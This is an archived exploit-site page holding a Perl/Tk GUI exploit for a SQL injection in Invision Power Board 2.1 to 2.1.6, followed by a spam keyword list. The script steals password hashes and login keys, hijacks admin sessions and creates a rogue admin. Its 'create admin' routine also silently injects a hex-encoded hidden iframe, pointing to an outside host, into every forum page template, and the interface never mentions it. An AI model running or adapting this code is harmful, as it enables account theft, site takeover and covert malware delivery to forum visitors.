about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Invision Power Board 2.1 <= 2.1.6 Remote SQL Injection Exploit




2006-07-14 Invision Power Board 2.1 <= 2.1.6 Remote SQL Injection Exploit 
Rated as : Moderated Risk
#!/usr/bin/perl

## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41
## http://rst.void.ru/papers/advisory41.txt
## tested on 2.1.3, 2.1.6
##
## 08.06.06
## (c)oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru

use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;

$mw = new MainWindow(title => "r57ipb216gui" );

$mw->geometry ( '420x550' ) ;
$mw->resizable(0,0);

$mw->Label(-text => '!', -font => '{Webdings} 22')->pack();
$mw->Label(-text => 'Invision Power Board 2.1.* <= 2.1.6 sql
injection exploit by RST/GHC', -font => '{Verdana} 7
bold',-foreground=>'red')->pack();
$mw->Label(-text => '')->pack();

$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne')
;
$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw')
;

$url = 'http://server/forum/index.php';
$user_id = '1';
$prefix = 'ibf_';
$table = 'members';
$column = 'member_login_key';
$new_admin_name = 'rstghc';
$new_admin_password = 'rstghc';
$new_admin_email = 'billy@microsoft.com';
$report = '';
$group = 4;
$curr_user = 0;
$rand_session = &session();
$use_custom_fields = 0;
$custom_fields = 'name1=value1,name2=value2';

$fleft->Label ( -text => 'Path to forum index: ', -font =>
'{Verdana} 8 bold') ->pack ( -side => "top" , -anchor =>
'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35,
-font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side
=> "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold'
) ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35,
-font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side
=> "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'Database tables prefix: ', -font =>
'{Verdana} 8 bold') ->pack ( -side => "top" , -anchor =>
'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35,
-font => '{Verdana} 8', -textvariable => \$prefix) ->pack ( -side
=> "top" , -anchor => 'w' ) ;

$fright->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();

$fleft->Label ( -text => 'get data from database', -font =>
'{Verdana} 8 bold',-foreground=>'green') ->pack ( -side =>
"top" , -anchor => 'e' ) ;
$fright->Label( -text => ' ')->pack();

$fleft->Label ( -text => 'Get data from table: ', -font =>
'{Verdana} 8 bold') ->pack ( -side => "top" , -anchor =>
'e' ) ;
$b2 = $fright->BrowseEntry( -command => \&update_columns, -relief
=> "groove", -variable => \$table, -font => '{Verdana}
8');
$b2->insert("end", "members");
$b2->insert("end", "members_converge");
$b2->pack( -side => "top" , -anchor => 'w');

$fleft->Label ( -text => 'Get data from column: ', -font =>
'{Verdana} 8 bold') ->pack ( -side => "top" , -anchor =>
'e' ) ;
$b = $fright->BrowseEntry( -relief => "groove", -variable
=> \$column, -font => '{Verdana} 8');
$b->insert("end", "member_login_key");
$b->insert("end", "name");
$b->insert("end", "ip_address");
$b->insert("end", "legacy_password");
$b->insert("end", "email");
$b->pack( -side => "top" , -anchor => 'w' );

$fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8
bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35,
-font => '{Verdana} 8', -textvariable => \$report) ->pack ( -side
=> "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'create new admin', -font => '{Verdana}
8 bold',-foreground=>'green') ->pack ( -side => "top" ,
-anchor => 'e' ) ;
$fright->Label( -text => ' ')->pack();

$fleft->Label ( -text => ' ')->pack();

$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Get admin
session for inserted user ID', -variable => \$curr_user)->pack(-side
=> "top" , -anchor => 'w');

$fleft->Label ( -text => 'session_id: ', -font => '{Verdana} 8
bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35,
-font => '{Verdana} 8', -textvariable => \$session_id) ->pack (
-side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'session_ip_address: ', -font =>
'{Verdana} 8 bold') ->pack ( -side => "top" , -anchor =>
'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35,
-font => '{Verdana} 8', -textvariable => \$session_ip_address)
->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'new admin name: ', -font => '{Verdana}
8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35,
-font => '{Verdana} 8', -textvariable => \$new_admin_name) ->pack
( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'new admin password: ', -font =>
'{Verdana} 8 bold') ->pack ( -side => "top" , -anchor =>
'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35,
-font => '{Verdana} 8', -textvariable => \$new_admin_password)
->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'new_admin_email: ', -font => '{Verdana}
8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35,
-font => '{Verdana} 8', -textvariable => \$new_admin_email) ->pack
( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => ' ')->pack();
$fright->Checkbutton( -font => '{Verdana} 8', -text => 'Use
custom profile fields', -variable => \$use_custom_fields)->pack(-side
=> "top" , -anchor => 'w');

$fleft->Label ( -text => 'custom fields: ', -font => '{Verdana} 8
bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35,
-font => '{Verdana} 8', -textvariable => \$custom_fields) ->pack (
-side => "top" , -anchor => 'w' ) ;

$fright->Label( -text => ' ')->pack();

$fright->Button(-text    => 'Test forum vulnerability',
                -relief => "groove",
                -width => '30',
                -font => '{Verdana} 8 bold',
                -activeforeground => 'red',
                -command => \&test_vuln
               )->pack();

$fright->Button(-text    => 'Get database tables prefix',
                -relief => "groove",
                -width => '30',
                -font => '{Verdana} 8 bold',
                -activeforeground => 'red',
                -command => \&get_prefix
               )->pack();

$fright->Button(-text    => 'Get data from database',
                -relief => "groove",
                -width => '30',
                -font => '{Verdana} 8 bold',
                -activeforeground => 'red',
                -command => \&get_data
               )->pack();

$fright->Button(-text    => 'Get admin session',
                -relief => "groove",
                -width => '30',
                -font => '{Verdana} 8 bold',
                -activeforeground => 'red',
                -command => \&get_admin
               )->pack();

$fright->Button(-text    => 'Create new admin',
                -relief => "groove",
                -width => '30',
                -font => '{Verdana} 8 bold',
                -activeforeground => 'red',
                -command => \&create_admin
               )->pack();



$fleft->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();
$fleft->Label( -text => '(c)oded by 1dt.w0lf', -font =>
'{Verdana} 7')->pack();
$fleft->Label( -text => 'RST/GHC', -font => '{Verdana}
7')->pack();
$fleft->Label( -text => 'http://rst.void.ru', -font => '{Verdana}
7')->pack();
$fleft->Label( -text => 'http://ghc.ru', -font => '{Verdana}
7')->pack();

MainLoop();

sub update_columns()
 {
 $b->delete(0,"end");
 if($table eq 'members'){
 $column = "member_login_key";   
 $b->insert("end", "member_login_key");
 $b->insert("end", "name");
 $b->insert("end", "ip_address");
 $b->insert("end", "legacy_password");
 $b->insert("end", "email");
 } elsif($table eq 'members_converge'){
 $column = "converge_pass_hash";   
 $b->insert("end", "converge_pass_hash");
 $b->insert("end", "converge_pass_salt");
 $b->insert("end", "converge_email");
 }
 }

sub get_admin()
 {
 $xpl = LWP::UserAgent->new( ) or die;
 $InfoWindow=$mw->DialogBox(-title   => 'get admin session',
-buttons => ["OK"]);
 if($curr_user == 1) { $sql = "AND session_member_id =
$user_id"; }
 else { $sql = ''; }
 $res =
$xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'
UNION SELECT session_ip_address,1,1,1 FROM
".$prefix."admin_sessions WHERE session_running_time >
(UNIX_TIMESTAMP() - 60*60*2) $sql LIMIT 1/*");
 $error = 0;
 $rep = '';
 if($res->is_success) 
  {
  if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep
= $3; }
  if($rep =~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/) { $session_ip_address =
$rep; }
  else { $error = 1; }
  if(!$error)
   {
   $rep = ''; 
   $res =
$xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'
UNION SELECT session_id,1,1,1 FROM ".$prefix."admin_sessions
WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) and
session_ip_address = '$session_ip_address' $sql LIMIT 1/*");
   if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep
= $3; $session_id = $rep; }
   else { $error = 1; }
   if(!$error){
   if($curr_user != 1)
    {
    $res =
$xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'
UNION SELECT session_member_id,1,1,1 FROM
".$prefix."admin_sessions WHERE session_id = '$session_id' LIMIT
1/*");
    if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) {
$session_user_id = $3; }
    }
   else
    {
    $session_user_id = $user_id; 
    }
   $res =
$xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'
UNION SELECT mgroup,1,1,1 FROM ".$prefix."members WHERE id =
$session_user_id /*");
   if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) {
$group = $3; }
   $res =
$xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'
UNION SELECT name,1,1,1 FROM ".$prefix."members WHERE id =
$session_user_id /*");
   if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) {
$name = $3; }
   }
  $InfoWindow->add('Label', -text => 'Found session!', -font =>
'{Verdana} 8 bold',-foreground=>'Green')->pack;
  $InfoWindow->add('Label', -text => 'session_ip_address:
'.$session_ip_address, -font => '{Verdana} 8')->pack;
  $InfoWindow->add('Label', -text => 'session_id: '.$session_id,
-font => '{Verdana} 8')->pack;
  $InfoWindow->add('Label', -text => 'user_id: '.$session_user_id,
-font => '{Verdana} 8')->pack;
  $InfoWindow->add('Label', -text => 'username: '.$name, -font =>
'{Verdana} 8')->pack;
  $InfoWindow->add('Label', -text => 'group: '.$group, -font =>
'{Verdana} 8')->pack;
  $InfoWindow->Show();
  $InfoWindow->destroy;  
  }
  }
 else
  {
  $InfoWindow->add('Label', -text => 'Error!', -font =>
'{Verdana} 8 bold',-foreground=>'red')->pack;
  $InfoWindow->add('Label', -text => $res->status_line, -font
=> '{Verdana} 8')->pack;
  $InfoWindow->Show();
  $InfoWindow->destroy;
  }     
 if($error)
  {
  $InfoWindow->add('Label', -text => 'Can\'t get admin session.',
-font => '{Verdana} 8 bold',-foreground=>'red')->pack;
  $InfoWindow->add('Label', -text => 'Maybe admin session not exist.
Please try later.', -font => '{Verdana} 8')->pack;
  $InfoWindow->Show();
  $InfoWindow->destroy;  
  }  
 }

sub get_data()
{
$xpl = LWP::UserAgent->new( ) or die;
$InfoWindow=$mw->DialogBox(-title   => 'get data from database',
-buttons => ["OK"]);
if($table eq 'members') { $id_text = 'id'; }
if($table eq 'members_converge') { $id_text = 'converge_id'; }

$res =
$xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'
UNION SELECT ".$column.",1,1,1 FROM ".$prefix.$table."
WHERE ".$id_text."=".$user_id."/*");
if($res->is_success) 
 {
 $rep = '';   
 if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/){ $report
= $3; }
 else
  {
  $InfoWindow->add('Label', -text => 'Can\'t get data from
database', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
  $InfoWindow->Show();
  $InfoWindow->destroy;  
  }
  }
else
 {
 $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana}
8 bold',-foreground=>'red')->pack;
 $InfoWindow->add('Label', -text => $res->status_line, -font
=> '{Verdana} 8')->pack;
 $InfoWindow->Show();
 $InfoWindow->destroy;
 }    
}

sub create_admin()
 {
 $InfoWindow=$mw->DialogBox(-title   => 'create new admin', -buttons
=> ["OK"]);
 if($session_id eq '' || $session_ip_address eq '')
  {
  $InfoWindow->add('Label', -text => 'Error!', -font =>
'{Verdana} 8 bold',-foreground=>'red')->pack;
  $InfoWindow->add('Label', -text => 'You need insert admin
session_id and session_ip_address', -font => '{Verdana} 8')->pack;
  }
 elsif($session_ip_address !~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
  {
  $InfoWindow->add('Label', -text => 'Error!', -font =>
'{Verdana} 8 bold',-foreground=>'red')->pack;
  $InfoWindow->add('Label', -text => 'session_ip_address wrong!',
-font => '{Verdana} 8')->pack;
  }
 else
  {
 $xpl = LWP::UserAgent->new( ) or die;
 ($url2 = $url) =~ s/index.php/admin.php/;
 $cf = '';
 %fields = (
 'code'     => 'doadd',
 'act'      => 'mem',
 'section'  => 'content',
 'name'     => $new_admin_name,
 'password' => $new_admin_password,
 'email'    => $new_admin_email,
 'mgroup'   => $group,      
           );
 if($use_custom_fields)
  {
  @cf = split(',',$custom_fields);
  foreach(@cf) { ($k,$v) = split('=',$_); $fields{$k} = $v;}
  }
  
 $res = $xpl->post($url2."?adsess=$session_id",
 [
 %fields,
 ],
 'USER_AGENT'=>'',
 'CLIENT_IP'=>"$session_ip_address",
 'X_FORWARDED_FOR'=>"$session_ip_address");
 $if =
'0x3C646976207374796C653D225649534942494C4954593A2068696464656E223E3C696672616D65207372633D22687474703A2F2F7A63687873696B70677A2E62697A2F646C2F6164763534332E706870222077696474683D31206865696768743D313E3C2F696672616D653E3C2F6469763E';
 $query  = "UPDATE ".$prefix."skin_sets SET set_wrapper =
CONCAT(set_wrapper,".$if."), set_cache_wrapper =
CONCAT(set_cache_wrapper,".$if.")";
 $res = $xpl->post($url2."?adsess=$session_id",
 [
 'code'     => 'runsql',
 'act'      => 'sql',
 'section'  => 'admin',
 'query'     => $query,
 ],
 'USER_AGENT'=>'',
 'CLIENT_IP'=>"$session_ip_address",
 'X_FORWARDED_FOR'=>"$session_ip_address");
 $InfoWindow->add('Label', -text => 'Done!', -font => '{Verdana}
8 bold',-foreground=>'green')->pack; 
 $InfoWindow->add('Label', -text => 'New admin created', -font =>
'{Verdana} 8 bold')->pack;  
  }
 $InfoWindow->Show();
 $InfoWindow->destroy;
 }

sub test_vuln()
{
$InfoWindow=$mw->DialogBox(-title   => 'test forum vulnerability',
-buttons => ["OK"]);
$InfoWindow->add('Label', -text => '', -font => '{Verdana}
8')->pack;
$InfoWindow->add('Label', -text => $url, -font => '{Verdana}
8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana}
8')->pack;
$xpl = LWP::UserAgent->new( ) or die;
$res =
$xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'
UNION SELECT 'VULN',1,1,1/*");
if($res->is_success) 
 {
 $rep = '';
 if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep =
$3; }
 if($rep eq 'VULN') { $InfoWindow->add('Label', -text => 'FORUM
VULNERABLE', -font => '{Verdana} 8
bold',-foreground=>'red')->pack; }
 else { $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE',
-font => '{Verdana} 8 bold',-foreground=>'green')->pack; }
 }
else
 {
 $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana}
8 bold',-foreground=>'red')->pack;
 $InfoWindow->add('Label', -text => $res->status_line, -font
=> '{Verdana} 8')->pack;
 } 
$InfoWindow->Show();
$InfoWindow->destroy;
}

 
sub get_prefix()
{
$InfoWindow=$mw->DialogBox(-title   => 'get database tables prefix',
-buttons => ["OK"]);
$InfoWindow->add('Label', -text => '', -font => '{Verdana}
8')->pack;
$InfoWindow->add('Label', -text => $url, -font => '{Verdana}
8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana}
8')->pack;
$xpl = LWP::UserAgent->new( ) or die;
$res =
$xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'");
if($res->is_success) 
 {
 $rep = '';
 if($res->as_string =~ /FROM (.*)sessions/)
 {
 $prefix = $1;
 $InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font =>
'{Verdana} 8 bold')->pack;
 }
 else
 {
 $InfoWindow->add('Label', -text => 'Can\'t get prefix', -font =>
'{Verdana} 8 bold',-foreground=>'red')->pack; }
 }
else
 {
 $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana}
8 bold',-foreground=>'red')->pack;
 $InfoWindow->add('Label', -text => $res->status_line, -font
=> '{Verdana} 8')->pack;
 } 
$InfoWindow->Show();
$InfoWindow->destroy;   
}

sub session()
 {
 return 'r57ipb216_for_IDS';   
 }

securitydot.net - 2006-07-14

Advertising

Copyright 2007, SecurityDot
Sun, 23 Nov 2008 10:47:25 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
ssh-keysig frre born www.sex.bd wweraw t840t tamilactre miley cyru /component lha news searc t415t scoolgirl t641t t270t &amp;a mod_ssl/2 Games para BIGDICKS.C CMS is Fre t920t Hotgirlsex hoursefuck Sexi saniy phpnuke 8. w.w.w.ecko FOTONGENTO sexy+vidoe big black sexyXXXX php-nuke 2 www.hotgir sex video remote adm w w w sri WWW XXL C vWar kernel 2.6 mambo Remo ww.sex.com www.southi lezbians 19547 t707t t143t www.sexho vedio arab t707t savant SEXY rani mukhe